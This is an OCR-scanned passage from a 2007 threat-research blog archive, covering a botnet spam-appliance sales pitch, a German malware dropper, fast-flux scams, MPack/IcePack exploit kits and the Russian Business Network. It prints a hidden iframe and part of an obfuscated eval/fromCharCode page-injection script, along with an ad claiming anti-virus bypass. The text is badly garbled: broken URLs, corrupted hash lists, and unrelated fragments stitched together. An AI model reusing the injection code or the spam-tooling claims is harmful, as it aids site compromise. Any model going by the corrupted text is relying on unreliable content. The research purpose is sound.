butterf4.ico 
620aaf734eba884ad6aabf47d012aded 
butterf5.ico 
5ffe1d1b86383c2f6e923377cb0c9796 
butterfly.ico 
c381c5859801bd6c75d4a7ddaccf6d64 
buttrf11.ico 
b74c7960917f8faa2e50e3b6dd96f5a2 
buttrf12.ico 
91e4945194e4d251b6c7922966c1b25a 
buttrf13.ico 
b2d03641e8d4c0b49f58752610e81ba5 
buttrf14.ico 
7431277b0bfb0e508781b7019043d9ba 
buttrf15.ico 
4b001c4ada88fae681616e400cb6aff09 
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[8]China - the biggest black spot on the Internet’s map 
[9]Chinese Internet Censorship efforts and the outbreak 
[10]Securing Political Investments Through Censorship 
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[13]South Korea’s View on China’s Media Control and Censorship 
[14]China’s Internet Censorship Report 2006 

[15]Media Censorship in China - FAQ 

[16]Google and Yahoo’s Shareholders Against Censorship 
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[19]Real Time Censored URL Check in China 
[20]Censoring Flickr in China 


H 


http://www.rsf.org/article.php3?id_article=23924 


. http://www.rsf.org/IMG/pdf/Voyage_au_coeur_de_la_censure_GB. pdf 


ttp://en.wikipedia.org/wiki/Information_wants_to_be_free 


. http://www. eurekalert .org/images/release_graphics/pdf/burmareport _24sept2007_press. pdf 
. http: //www.cs.unm. edu/~crandall/cd/badwords.htm 
. http: //www.cs.unm.edu/~crandall/concept_doppler_ccs07.pdf 


ttp://ddanchev. blogspot .com/2006/01/china-biggest-black-spot-on-internets.htm 
_hvtp://adanchev. blogspot con/2006/02/chinese~internet~censorship- efforts tal 

10. 
1 


. http: //ddanchev.blogspot .com/2006/07/chinas- interest-of-censoring-mobile.htm 
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16. http: //ddanchev.blogspot .com/2006/12/google-and- yahoos-shareholders-against .htm 
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3.10.12 Managed Spamming Appliances - The Future of Spam (2007-10-13 16:08) 


What’s the future of spam? [1]Spammers breaking CAPTCHAs of legitimate email providers 
and take advantage of their clean IP reputation to send out their junk, or soammers cooperat- 
ing with botnet masters supplying newly infected hosts? [2]Try outsourcing as a concept [3]by 
renting a "managed spamming appliance" like the ones advertised as of recently. 


This is an automatically translated excerpt from a recent proposition for a newly devel- 
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buttrf16.ico 
10c778d52505bff1dfd85676614f1b11 
buttrf17.ico 
d6543391alee06958b45cldedea9d2b4 
buttrf18.ico 
435925d734baa6e206d5c6c09a72aeab 
buttrf19.ico 
9929ddd4cd5ae2f820af52a2a5ea71d8 
buttrf20.ico 
elblffbc5cb421f89ba92ee5c9a5e0ec 
buttrf21.ico 
481d19bf40aa18f737c443cae408c7e4 
buttrf22.ico 
3ef4d2aa7890053ff61519aff6e23f22 
buttrf23.ico 
1140601b36b72d13633ea2683al1c1b4f 
buttrf24.ico 
7af29c6b6dcb6ac5c2f3dc7b88c3216f3 
buttrf25.ico 
e€024c92e0a728cd6f9061b18c0e36d47 
cl.ico 
9e58b7fada909f944c7d91c64766f79a 
c2.ico 
8a071a68859ee537399ac9f526fadd9a 
c3.ico 
79dc039d6959b9a82d008c239956a4b9 
c4.ico 
27bf9c2c9b1cbdec51b72d7761blab1b 
camel.ico 
4fc04cdd9078147f4281e0d4c4979083 
camel2.ico 
3ffa8ca7da92bd808e562dbb8eabfc57 
cameleon.ico 
4d033361a883b004d215150810c6d84c 


cangeroo.ico 
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3f7ca944775abbe34694f5d79309523f 
Car.ico 
9559f7dbcb93219aaf54587bce9f9014 
cardin-1.ico 
f9107e5e1d956d1ad4cdd85d4b71ff78 
cardinal.ico 
fOcf4e7798e3bf02cfae56dfeNeab89c 
caribo.ico 
f0c468cf9e9bb94f6Ff2eacc353d699b6 
carriage.ico 
e€0a23c2127550482a72c1602f0323341 
cd.ico 
b35a7feb4318f71cc7dc775438e6155c 
cd2.ico 
€91e932779eb9190e23945c327d02fa4 
cheetah.ico 
da244a2277c3f4c5b3151cbb57e4881d 
chickdee.ico 
850d3eb09d5e1174cb87183fa439a933 
chicken.ico 
684d0a80d6b9ecae5d4860c237a52a85 
chimpa 1.ico 
cede6855c520b9b4d3936a4ecd21907e 
chipmunk.ico 
ca5a96a4d3c0ca46ce7fe3e9296fc7f3 
cinnibar.ico 
0414fd501d70a025cb510f14d3336140 
claw2.ico 
621efee27813f0e933cdd0343a3537a9 
claw3.ico 
7336595601bc4574544cd3f99d18f2cf 
Coca-Cola.ico 
191a2c79e200737ebf414c5460172c32 
cock.ico a6803058b510f739228b8bfced2605dc 
cockat.ico 
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c07a078032d69b66023c116d3071a7c4 
comp39.ico 
494f6f89b9156f88056e98ace2c3d62b 
computer.ico 
3cf412d147c065b87120b9950deb9e03 
cow.ico 
b0106d62b37cdf0ddf249d6d9234374f 


cow2.ico 0f355962848b31b1c9a79db96a8615ca 
croc.ico c96e01c9f82066a086f49e394f23e9d4 


croc2.ico 
ad575dd032aflddf89efbb4e168deba6 
crocodil.ico 
ddf070ce2598975fd466edb276e9c725 


crue.ico e6f781932381c74ee9e73 Laffdd57b82 


crue2.ico 
b1820ccff7ccdea2a29bd523c1f05513 
cyber hammer.ico 
3402acfb7897f15bf9e81912fb5edfbc 
cyber _plumb.ico 
2066a3cd66490bd75d5c35f614467059 
cyber saw.ico 
38d2fc6b2dd3b2af6d6aba42a633396a 
cyber screw.ico 
9fbd9d3cdcf083707bcf24993e2dc444 
cyber screws.ico 
bbb6809bdd48c03136548de7960c5680 
cyber _tools.ico 
3bcc9e9300c1ec84264c31620ef48207 
Cyclep.ico 
b3ffe4ala3110ddd8cc46df14067c0c0 
daisy.ico 
de24db4efdd91925428af4d599e059e8 
danger-icon.ico 
5e82df555662308b5d73006386916db1 
DAP.ico 
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23d9d9491d34ea08795a30f336874466 
deer1.ico 
f69d24afdfb899c9lecleea41fc7c2d6 
deer2.ico 
8d1a876732a68c275cfo6ae2a9f13eb9 
defacer w.ico 
6388d0ee6acbc34a416413d4309678c0 
desktop.ico 
10ff986a7f6f60albce0ca36739bc766 
dinol.ico 
4f0cf27a080f5362f15e5822a92e44d5 
dino2.ico 
42b8d5bfc6439c664b1137276234f11b 
dino3.ico 
e€251c2054d4b4371a82502610c8c54f3 
dino4.ico 
035e3508bf2bd5e308254d8af3be155f 
dino6.ico 
a963af9cd57a29acc5dca25b2265a698 
dino7.ico 
96aea1341a66a4e6841331a212a2eccd 
dinoegg1.ico 
7a60ef1ld70a661501laad1f22bd5f42ee 
dinoegg2.ico 
0c428b9ac5fd6e4056e0a2835086e472 
dio.ico 
20d619723554cab52d74af742a530c1b 
dio2.ico d34fbf32a4a818e42c9cfff22c8dca58 
directX.ico 
df4133828bdfab8731la8eale751lelafc 
Disney.ico 
9418ece3997912dcb7e61488cb6eefa7f 
document.ico 
e5242cfef974bd4ec9763e2ba6828d08 
donkey1.ico 

11136 


cea7d78de3c9ca04e082afdcbc455c5d 
donkey2.ico 
9a563234c2b7cacad4a686bea4c7d242 
dos.ico 
€936af92391ffb07fdc5al428cf46ff4 
DRINK.ICO 
10ece89baaa0b7ffadcfb65ba6214bfd 
drive.ico 
5a0echd742c149e63d7ed02b4f3d4e41 
drive2.ico 
2e31d7710e42b99befd94b852873dc23 
dsk.ico 
ec709480999b80cbfc39276a0c255ec3 
duck.ico fel4041caf4b30e4ac236678779dbf84 
duck2.ico 
53a957273968cd161df061d8789985a6 
duck3.ico 
698e2009674cb9d1154500354ed0415d 
duck4.ico 

70451 ffde42e0a5f57c8bfc250b61176 
duck5.ico 
8649a41a483216b1a28243b65bb12215 
dvd.ico 
717ab237f76865c652179de9d2c87985 
eagle.ico 
c96ba5al1df99716da5863ea82e636751 
eagle2.ico 
a79f4b2384189d697b9a0bc56c0c0240 
eagle3.ico 
5b954b978b0d9d63f6a5fb2fcd078dd3 
eagle4.ico 
856c73164056116a6e86bc37fe9751ba 
eagle5.ico 
a0894534657dd3887478bc8eb60f727b 


eagle6.ico 
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16eceab49c2b128ade2fc848dc85bb57 
earrings.ico 
3e4976adad68d0cc5526947550d2a4b7 
earth.ico 
8504a537e9f5a102540f7a7038754d5d 
earth2.ico 
b0eed7d71f0ad44ae869aa0a433d6c4e 
earth3.ico 
c41c7ef732804f73ab046d10fc9b15e8 
earwig.ico 
6ce344d94dd48a60b62bc42aceleeYef 
eFax3.ico 
ba85172fflfd9088fleee086c4blealb 
elephan2.ico 
c3188e34feed28d17a99b8e1c1500722 
elephan3.ico 
c7cd96ad61ec98c384ec8c47ce5e597e 
elephan4.ico 
7fa957d284ed0edc25e49e45a0310981 
elephant.ico 
046f85f2f6Ec2cc6234ee75b9f0ecb780 
emule.ico 
45e3110c48717ea28d95004ebd2da4be 
excel.ico 
6bbcbc8c4a154a2d64ed32954d93c5b8 
exploit _z.ico 
8e9071b74b1863a2039dd1805b7439db 
extract.ico 
9634c307420b029a0e2a033685a990c0 
fawn.ico a2d8fd634ac3e9d74c02aa31b17d0d0f 
ferret1.ico 
72b89dd9559c4ba94ac2b74b9d629b5e 
ferret2.ico 
dd4461387aec2522bfe91a413d082a09 
ferret3.ico 
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3bd8c3126e8f517 7fc6480cf1e038494 
ferret4.ico 
ee5b2a38f35846b96558967478f613a4 
ferret5.ico 
562760f1f6éb6fec1410ab72a76aa004e 
ferret6.ico 
99b6e8274fdb20355f64719a30707a36 
ferret7.ico 
bbO1bec7f959e8e6a02ee1cae4b7093b 
ferret8.ico 
075080d3d13163a3894e86b6f32bacf6 
ferret9.ico 
678cd6c85a57cO7acf7afc2f4cce92f7 
find.ico d5a09ae4cc0b76bd9a84146f6d3ad986 
first _aid.ico 
2a9f1ddb95e94aa605431073997774ba 
flaming2.ico 
94a8774963f4e6e627dc66f6d2bd7b85 
flamingo.ico 
c43fe3lafc9bbfbbe0b6734df87bdbb7 
flash exe.ico 
543d8dcff48c5150eaa02ea75bdd1346 
flatcat.ico 
84d7e63147f7307528e5d92b57359185 
floyd.ico 
100ecbf4e6543df59d403bc0b97deb77 
floyd2.ico 
f37adf7dec006337111cebc1913815bb 
floyd3.ico 
0b3b8f1115525bd2a0bf89a5d2b0e02f 
floyd4.ico 
2c57e74e96fdb5136d9eb0afb5c40f6l1 
fly01.ico 
f84ab3c5ff26428dce55fc2a28b61b3f 
fly02.ico 
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oped spam system that comes in the form of hardware with embedded botnet, just consider 
the idea for a second before reading and you'll get the point : 


Among spammers very agreement that spam has become a profitable and die their last 
months, years. And it is understandable: profit fell, suppliers downloads expensive prices 
almost to the size of profits, a dozen well-known and had a good year or two ago turnover 
spammers departed from the market, so even monsters flow of spam once died theme ran in 
the stream than definitive did the topic boring. 


| am pleased to present to you the technology that will make your distribution more effi- 
cient and voskresit characteristic of the spam profits. 


Our software allows you spamit in such quantities that letter competitors simply lost 
among your. Also you get tools to control the delivery of letters and inboks spam those 
domains that are not being held by any other spam. 


We have reached the maximum speed possible with the distribution of each bot and de- 
fended it against possible anti-virus and firewalls. In doing so, your botnety invincible. 
Interesting? And now in more detail. 


Overall software works like any other botmeyler. Botnet controlled part of a server, it 
created letters and mailing bases loaded. Botha knocking over the job to a server, get a piece 
base, and a letter vdohnovlenno spamyat until the turn will come next door for the job. 


Each server keeps 2500 + online bots, and the maximum speed reaches 7000 mailing 
letters per second, is the highest speed of all current market spam systems. Of course, the 
speed depends largely on the quantity and quality of downloads, quality and type of database 
(country, large domains, etc). 2500 online for you too little? No problem. Berit 2, 5, 10 servers, 
as long as you want. 


In our system, there is every possible means to randomise from any randomise texts fin- 
ishing randomnyh generate images on the fly or finished morphing images, as well as the 
ability to create their own makro-skripty. You can independently create and edit headers (if 
there is time to do so, fresh headlines you will download our spam-inzhenery). 


You can do so zarandomlennye letter, as far themselves want. After randomization let- 
ter, you can immediately check finished look and see the results of the verification Spam 
Assasin ohm. 


For specific newsletters (probiv major domains, etc), there is a possibility in detail set- 
tings bots (different types of reactions to the texts of error codes and mail servers). You can 
customize the system to thin to work with certain domains to improve the quality and speed 
of spam to these domains, identifying the individual parameters for each domain (how many 
letters it takes for a session timeouts, own blacklist bots, enter special codes for SMTP session 
for given domain, etc.) 


To avoid zamorachivatsya processing bases on a separate server, all options included in 
the processing software. Among them: removal from the database of addresses abuzerov, 
splitting bases on the large and normal domains merger bases subtraction bases and checking 
for uniqueness. 
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24 hours a day, 7 days a week, you can use the services tehpodderzhki and complex is- 
sues of sending spam to discuss with our engineers. In addition, you can order the service 
"personal manager" who will help draw up a letter to monitor the continuous distribution, will 
help choose the supplier of downloads and decide on the overall strategy for working with 
partnerkami. The main advantages : 


1. The speed and delivery. Average up-to medium-speed downloads of 1.5 letters per 
second from one spamyaschego bots, 2 to bots spamyat at speeds of 3000 letters per second, 
equal to 10 leading to millions of messages delivered per hour. This average figures for good 
loading each bot could spamit up to 3.5 letters per second. 


2. The persistence of bots. Botha bypass all the latest version of anti-virus and faer- 
vollov, including the latest version of Zone Alarm, Outpost, Kaspersky, and the bot rigidly set 
in the system so that they are impossible to remove, even in safe mode. All innovation and 
refinement, we test drivers bots not only stands the test on different versions of the OS, but 
also on actual downloads from various suppliers. Cleaning loadera happens every day. 


3. Convenience work, and further opportunities for constant refinement. We make the 
process convenient and efficient spam, the whole routine in the most automated, the time our 
customers spend at statov refresh. However, if you or your staff would like to have enough 
knowledge to extract the maximum from their bots and bases, you have a beautiful high-tech 
istrument it may izmennie any settings. 


4. Business centers, skilled technical support. Complex program complex, which is fully 
explored - unique challenge, our support team will help you in any questions and solve any 
problems. 


5. Flexible pricing policy. Our command is spam many years in different directions, and 
our customers are top-sellerami many partnerships programs we are familiar with the process 
of naslyshke not spam. With this experience and knowledge, we do your business more stable 
and profitable. Our tariff plans: 


1-2 servers - $ 4000 per server 
3-5 servers - $ 3000 per server 


Let’s summarize the key points : 


-a "Spamming appliance" comes with 2500+ zombie bots, capable of sending 7000 emails per 
second 

- built-in verification for detection against common spam scoring systems 

- managed anti virus bypassing capabilities and signatures based detection 

- technical support 


What’s next to come? Possibly a USB stick with built-in [4]C &C to a botnet with full 
admin rights. 


1. http: //ddanchev. blogspot .com/2007/09/spammers-and-phishers-breaking-captchas .htm 
2. http: //ddanchev. blogspot .com/2007/03/underground-economys-supply-of-goods .htm 

3. http: //ddanchev. blogspot .com/2007/10/dynamics-of-malware-industry.htm 
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4. http://ddanchev. blogspot .com/2007/03/botnet-communication-platforms.htm 


3.10.13 The Global Security Challenge - 2007 (2007-10-15 23:27) 


GLOBAL SECURITY London 
CHALLENGE Business 
en” & November 2007 Schoot 
4 Hotel Russell, London 


Global Security Challenge.....unearthing the security technologles of tomorrow 


Be a partof the world’s largest competition aimed at finding the most innovative security technology 
startup in the world. This conference brings together senior govemment officials, business leaders, 
venture capitalists, and entrepreneurs m an optimal business environment. 


Global Security Challenge 

A competition launched by London Business School students called the Global Security Challenge (GSC) is the 
first to find and select the most promising security technology start-up in the world, Five Finalists compete against 
each other at the Grand Final in London for $500K grant award and mentorship from Paladin Capital Group. 


Some of Our Speakers: 

» Sir Richard Dearlove, former Chief of British Secret Intelligence Service (MI6) 
» Alastair MacWillson, Managing Partner of Global Security Practice, Accenture 

» Jett David, Deputy Director of TSWG, U.S. Department of Defense 

» Stephen Bonner, Global Director of information Risk Management, Barclays 

» William Beer, European Security Practice Director, Symantec 

» Ken Minihan, former Director of US National Security Agency (NSA) 


The [1]Global Security Challenge have [2]just announced the world’s five most promising 
security startups chosen to compete at the GSC Final in London for a $500K grant this 
November. They are: 


- [3]Auxetix (UK) - fortifies protection against multiple explosions through helical-auxetic 
nets 


- [4]EyeMarker (USA) - scans the eye to rapidly and non-invasively assess a person’s 
health 


- [5]NoblePeak Vision (USA) - enabling the rapid detection and identification of people 
and objects at night without active illumination 


- [6]Psylock (Germany) - identifies users through biometric analysis of typing behavior 


- [7]XID Technology (Singapore) - face synthesis technology for real-time 3D _ redic- 
tion/replacement in a 2D video 


[8]Disintermediating the main sources of R &D with [9]innovation and cost-effectiveness 
in mind, is a business practice that’s already embraced by numerous deep pocketed future 
clients interested in outsourcing innovation in the form of such contests. I’m particularly 
interested in Psylock’s future development, and it’s great to note that the folks behind this 
typing behavior authentication even set up [10]a demo of the concept. 
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And given that [11]the GSC are also embracing the blogosphere, let’s wish them long- 
term passion and sustained professionalism in their initiative to fund promising security 
oriented startups. 


. http: //ddanchev. blogspot .com/2006/05/global-security-challenge-bring-your.htm 


. http://www. globalsecuritychallenge.com/ 
. http://www. auxetic.co.uk/ 


. http: //www.psylock.com/ 
. http: //www.xidtech.com/ 
. http: //ddanchev. blogspot .com/2007/05/disintermediating-major-defense.htm 


1 

2 

3 

4 

5, http: //aww.noblepeak. con/ 

6 

7 

8 

9, http://ddanchey blogspot .con/2006/04/ spotting-raluable~investnents~in. hia 


. http: //demo.psylock.de/index.php?ClientApplication=a98cbOaee4f 16dbc44d5b9c25cd4f cd 


11. http: //globalsecuritychallenge2007. blogspot .com/ 


3.10.14 DIY German Malware Dropper (2007-10-16 15:58) 


x 0.3+ e) 


“Abetter Name: Spezielles: 


1) Agressiv Mode | 
; Speichern in: @& Passive Mode | 
Ic: 7 (* Standart 


Aktuell: 
[ t ( Eigenes Verzeichniss >) 
Kill Aktion: Zusatz Befehle: Execute Aktion: 


I" XP-Firewall Itskill shell (© Standart 
[ XP-System Guard 
x T [Media ipa 7 
[i Sees Front Picture Execute: 
I Antivir Sheduler — [Server lexe ~| 


[~ SpyBot Guard . 
I Erase SpyBot Guard Front Server Execute: © Eigene 


ee | 2 
. ZoneAlarm 
vee alr! 


O% 


|” Kaspersky 
[ Nod32 


Yet another publicly available DIY malware dropper this time courtesy of German compared to 
Russian malware crews, whose releases on the other hand are starting to live in a "high profit 
margins only" product/service business model, thus introducing [1]propriatery malware tools 
like the ones I’ve discussed in a previous post. Why would a malware crew member release 
such a tool for free? Respect, ego, quota of tools released to meet in order to remain inside 
the team? Could be, but on several occasions such freely available tools get backdoored too, 
like just the source codes for popular malware kits. 


You often hear that [2]Janti virus software is dead, that vendors end up their with quar- 
1120 


ters with meaningless percentage increases in every malware segment, meaningless in 
respect to the DIY trend. The idea has its pros and cons, no doubt about it, however it should 
orbit around different research questions such as : 


- which AVs are more ineffective, the ones which are not running due to the process list 
of each and every anti virus software now easily integrated within each and every malware 
dropper and malware tool in the wild? 


- or the ones whose often static update locations online get blocked by a malware in in 
order to prevent its detection supposedely to come in the next signatures update? 


Here’re [3]related overviews of malware tools. 


1. http: //ddanchev. blogspot .com/2007/10/dynamics-of-malware-industry.htm 


2. http: //anti-virus-rants .blogspot.com/2006/12/anti-virus-is-dead-not .htm 


3. http://seclists.org/fulldisclosure/2007/Aug/0411.htm 


3.10.15 Fast Fluxing Yet Another Pharmacy Scam (2007-10-16 21:16) 


ppp-? sI.hst bell.net www. matteroften.com 
R64K-O1.ish.de 


arcor-ip,net 
34-177.pools.arcor-ip.net 
vut.c2 


n.ntust.edu.tw 


78-106-40-85, 


natteroften.com 


[1]Spam and phishing are indeed starting to operate behind the curtains of a fast-flux network 
of constantly changing IPs of malware infected PCs that end up hosting the scams and phishing 
pages themselves for a certain period of time. And I’m certain that’s a trend and not a fad 
given the potential for increasing the average time a phishing or a scam site remains online, 
even the inability prove a certain IP was hosting it at a given period. 


1121 


vw 


/ r 
j 
| s 4 - 
sd 
} ? ~ - 
| Sd 
oe 
/ " 
~ ~ 
hi/ > 
a oe a 
} . 
teroten.cam >> - ~ > 
4 
~ Ase 
- - 
i 7 
\ \ > >. 
\ 
& 
; r 
} ~ 
- 
\ ~ 
- _ ‘ 
\ 
~ 
: -e » 
. - 
” 
y - > 
“ ~ 
" » - ee 
r 
a 
7 Ll 


Take for instance the latest [2]Canadian Pharmacy spam campaign, where in between the fast- 
flux, they didn’t even bother to register and use a legitimate SSL certificate, among the few 
visual proofs for the average end user that’s ensuring a certain degree of security, yet, in order 
to establish more trust, dead link logos such as "Verified by Visa", "Secured by GeoTrust", 
"ScanAlert - Hacker Safe", and "Verisign" are included at the processing order page. To me, 
that’s a typical [3]Rock Phish mentality - efficiency vs quality of the [4]phishing/scam campaign. 
The whole Canadian Pharmacy spam campaign is behind [5]an affiliate program forwarding the 
responsibility for promotion (spamming) and fast-fluxing, to the participants. 


1. [tapi 7 /adancheyblogapet,coa/2007/10/tast- fia open-end ocaus~inereaning, heal 
2. heap: //danchev. blogspot .con/2007/410/love-is~paychedelc~t00. html 

3, http: / /Adanchey. blogspot. con/2007/10/assessing-rock- phish campaign, htal 

4, netp://ddanchev. blogspot .con/2007/09/209-host- Locked. heal 

5. http: / /danchev. blogspot .com/2007/10/incentives-nodel-for-phareaceutical. hal 
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3.10.16 MPack and IcePack Localized to Chinese (2007-10-16 23:31) 


~ Microsoft Internet Explorer -|5) x; 
XH) REQ) BFW kRw IAD ha a 
Qae-©- |x) 2) ewe 

HiM ieee i st—i(i‘“‘“‘<za‘éa‘iss yl EB 


IE XP ALL 

QuickTime 
Win2000 
Firefox 


Opera? 


MySQL-based 


(c) 2007 RSW MABITIL 
MPa RIL ATM AM Oie . ORPCASL MELT POPLAR E RBA, WA BHR, Rie PABA 


It is logical to consider the possibility that once a malware author starts evaluating [1]the 
benefits out of [2]releasing a malware in an open source form, malware exploitation kits can 
also build communities around them. Since August, 2007, Chinese hacking groups can freely 
enjoy "the benefits" of [3]lcePack’s and [4]MPack’s malicious economies of scale attacking 
approach in the combination of a brain-damaging Keep It Simple Stupid exploitation tactic in 
the form of serving exploit URLs, which get [5]automatically embedded via a web application 
bug, or via [6Jautomated remote file inclusion enabled web site. 
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SOG Paes <_< 


2a 

SES 

HBR 
IcePack## 3 ¥ GRRE > LSB Rex) 


TAKER, SSSR, FAS LASMCASHSEASSR. 


PHPRA : 5.2.3 
MySQLIfE : Yes 
REBH : Fe? 
ESGIP : 
BRE IP : 
KBRBURKA: 0 


€] javascript: m0bj (2). junpURL (0) | | [ aa 


Let’s once again emphasize on the research question of [7]wouldn’t such malware kits and 
tools have a higher value if kept private, and why someone release them in the wild? Couple 
of months ago, the tools themselves were used as a bargain for improving the UVP (unique 
value proposition) on a large scale, that’s of course until they became a commodity. From 
my perspective, all warfare is based on deception, especially infowar, namely, if the idea of 
embedding an exploiting serving URL at a popular site in order to infect all of its visits becomes 
a commodity as an attack tactic, at the end it will be the ones whose fast-fluxing, javascript 
obfuscation, and timely crypting and rotating the malware binary skills will put them in a market 
leader position, where the new entrants, the ones cheering for having access to such tools will 
make the headlines, like the [8]default malware kit installation wannabies they are. 
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R Level 0 


<iframe src=" index. php” width="0" height="0"></iframe> 


Level 2 


<script language="JavaScript"> eval (unescape (" document. write%28String. fromCharCodeX 
2860%2C 105% 2C 102%2C 1 14%2C9T%2C 1 O9%2C 101%2CI2W%2C 1 1H¥2C 1 14%2CIGK2CG1W2CS4%2C 1 19%2C 119% 
2C119%2C53%2C4 6% 2C 1 04% 2COTHIACGGKIC 107%2C101%2C114%2C111%2C1 1 1HA2CAGK2CIS%2C 111%2C 109% 
2C4 7% 2C 105% 2C 99K 2C 101%2C4 TH2C 1 O5%2C 1 10%2C 100%2C101%2C 1 2ORACAGHIC 1 12%20104%2C112%2C3d% x 


By [9]ensuring that the market segment for malware in this case, has many participants and is 
not concentrated and operated by a few over-performing groups is a highly beneficial from the 
perspective of the most skilled and advanced groups continuing their operations in between 
the noise generated by the rest of market challengers. Now Playing in Cyberspace - "[10]The 
Revenge of the Chinese Script Kiddies". 


. http://ddanchev. blogspot .com/2007/09/custom-ddos- capabilities-within-malware.htm 


. http: //ddanchev.blogspot .com/2007/09/localizing-open-source-malware .htm 


ttp://ddanchev.blogspot.com/2007/07/icepack-malware-kit-in-action.htm 


. http://ddanchev. blogspot .com/2007/07/malware-embedded-sites-increasing.htm 


1 
2 
3 
4 
5. http://ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines .htm 
6 
7 
8 
9 


ttp://en.wikipedia.org/wiki/Remote_File_Inclusion 


. http: //ddanchev. blogspot .com/2007/10/dynamics-of-malware-industry.htm 
. http://ddanchev.blogspot .com/2007/09/google-hacking- for-mpacks-zunkers-and. htm 
. http: //ddanchev. blogspot .com/2007/03/underground-economys-supply-of-goods .htm 
10. http://ddanchev. blogspot .com/2007/10/peoples-information-warfare-concept.htm 
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3.10.17 Thousands of IM Screen Names in the Wild (2007-10-17 15:56) 
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In the past, malware interested in establishing a one-to-one social engineering communication 
channel with potential victims, used to crawl the hard drive, even [1]the web address book of 
the infected party looking for emails to self-email the binary to. And with [2]the rise of instant 
messaging communications, malware authors adapted [3]old techniques such as [4]harvesting 
for emails to IM communications by introducing IM screen names harvesting and positioning 
the practice as both a product in the form of the segmented email databases of millions of 
emails already harvested, and as a service, by aggregating publicly available profile data 
to deliver targeted messages often [5]in the form of phishing, [6]malware embedded URLs, 
[7]and spam. Hitlist’s based malware is nothing new, it’s actually malware authors borrowing 
the spammers "direct marketing" communication model, and while you cannot change your 
email’s account name unless of course you’re [8]using a disposable or [9]temporary email 
service, you can easily, in fact periodically change your screen name. 
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IM networks are on the other hand, [10]slowly adopting a "save the world from the clicking 
crowd" security awareness model by blocking common malicious file and domain extensions, 
an initiative that’s both applaudable and futile at the same time given the failure of URL 
filtering in today’s dynamic and user-generated content Web. Go through [11]an informative 
article by ScanSafe’s Dan Nadir with comments on Signature-based detection, Heuristics, 
Code Analysis, Code reputation, URL Reputation, and Traffic Behavioral Analysis. 


ttp://ddanchev. blogspot .com/2006/06/web-application-email-harvesting-worm.html 


ttp://ddanchev.blogspot.com/2006/01/whats-potential-of-im-security-market.html 


ttp://ddanchev.blogspot.com/2007/01/inside-email-harvesters-configuration.html 


_hetp:/ /computerord.con/tLogs/node/6359 
. http://www. hindu. com/thehindu/holnus/008200710160943. htm 
_netp:/ /adanchev. blogspot .con/2007 /05/asa-spansing bot bea 


ttp://www.sizlopedia.com/2007/05/27/top-20-temporary-and-disposable-email-services/ 


. http: //www.ghacks .net/2007/05/28/list-of-20-temporary-email-services/ 
10. http://trac.adiumx.com/wiki/MSNCensorship 
1 


http: //www.scmagazineus .com/The-failure-of-URL-filtering- in-an-increasingly-dangerous-web-world/article 
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3.10.18 The Russian Business Network (2007-10-18 18:22) 
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Rbnexploit.blogspot.com 


In case you haven’t come across it before, here’s an informative blog whose objective is 
to track events related to the [1]Russian Business Network (RBN) and expose its nodes in 
between : 


"Everything you wanted to know about the RBN and related enterprises - AKA ; Russian 
Business Network, RBNnetwork, RBusinessNetwork; the Internet Community’s favorite - 
exploiters, phishers, hacks, spammers, etc." 


Under the pressure put by the "wisdom of crowds" collective intelligence capabilities in 
analyzing pieces of the puzzle who make up the big picture in respect to the [2]Russian 
Business Network, [3]a representative of the RBN speaks out for the first time : 


"We can’t understand on which basis these organizations have such an opinion about 
our company," Tim Jaret of the Russian Business Network says in an e-mail interview. "We can 
say that this is subjective opinion based on these organizations’ guesswork." Jaret’s e-mail 
signature identifies him as working in RBN’s abuse department. Security researchers and 
anti-spam groups say the St. Petersburg-based RBN caters to the worst of the internet’s 
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scammers, renting them servers used for phishing and malware attacks, all the while enjoying 
the protection of Russian government officials. A report by VeriSign called the business 
"entirely illegal." 


What is the RBN at the bottom line? A diversified set of IP blocks located at different 
parts of world, who periodically appear within the deobfuscated javascipts of the sites who got 
IFRAME-ed and were found to serve malware by exploiting outdated browser vulnerabilities. 
What’s more interesting to me than the "yet another popular site which got IFRAME-ed by the 
RBN’s network" is the success of the popular malware exploitating kits using outdated and 
already patched vulnerabilities. What use are patches when no one is applying them, and 
aren't unpatched vulnerabilities just as effective as zero day ones? Yes, they are. 


Issues to consider: 


- the RBN offers bullet proof hosting upon signing some sort of contract, where they may easily 
forward the responsibility to the hoster of the malware, phishing and spamming, namely, on 
a contract basis those hosting such content violate their TOS agreement, now whether or not 
the RBN will remove them in a self-regulation manner or wait for an abuse letter to come, then 
delay it for couple of weeks while the campaign is still active is entirely different topic 


- during the first couple of hours of the Bank of India hack, once vendors and researchers 
started assessing the site, the RBN IP that was used as redirector removed the javascript 
obfuscation and forwarded every visitor to Google.com. My point is that, unless real-time 
CYBERINT is collected by trusted parties, it would be very hard to come up with historical 
evidence on some of their malicious activities 


- despite being a consolidated organization offering bullet proof hosting, they’re still not 
fast-fluxing any of their services on a large scale, an indication of a botnet behind the fast-flux, 
and while they’re just a couple of netblocks to filter, it could get more ugly and harder to trace 
back. So let’s "appreciate" the RBN’s laziness for the time being 


- the RBN is the tip of the iceberg whose clients’ successes in the form of embedding 
RBN IPs on the most recent malware cases led to the inevitable wisdom of crowds effect. What 
about the hundreds of thousands other not so well Known malware serving netblocks? 


What were some of the most recent cases where RBN IPs were used to serve malware? 
The [4]Massive Embedded Web Attack in Italy used to orbit around RBN IPs, various other 
[5]exploits serving domains and the [6]fake ms-counter.com were using RBN IPs, [7]Bank of 
India’s IFRAME and several [8]MPack control panels were pointing to RBN’s network too, and 
also the most recent Beer.ch [9]malware attack. It gets even more interesting. 


Here are for instance some of the fake anti-virus and anti-spyware applications hosted 
at the Russian Business Network in the time of blogging. The applications are cute, little, tiny 
35kb adwares : 


malwarealarm.com - active - Adware.Spysheriff 
xscanner.malwarealarm.com - active 
scanner.malwarealarm.com - active 
windowsafesurf.com - 403 forbidden 
spy-shredder.com - Adware.Spysheriff 


1129 


scanner.spy-shredder.com - active 

proantivirus.net - expired 

dragracers.biz - VirusBurst 

antivermins.com - Application.Antivermins.B / Virus.Win32.Spycrush.B 
adwareremover2007.com - Adware.Spysheriff 


The enemy you know is better than the enemy you don’t know, but on a large scale | 
fear the enemy | don’t know, namely the hundreds of thousands script kiddies now empow- 
ered with [10]open source and localized malware kits. Here are [11]two more related blog 
posts on [12]the RBN as well. 


. http: //rbnexploit. blogspot .com/ 


ttp://en.wikipedia.org/wiki/Russian_Business_Network 


. http: //www.wired.com/politics/security/news/2007/10/russian_networ 


. http: //ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 


1 
2 
3 
4 
5. http: //ddanchev.blogspot.con/2007/06/exploits-serving-dowains tal 
6 
7 
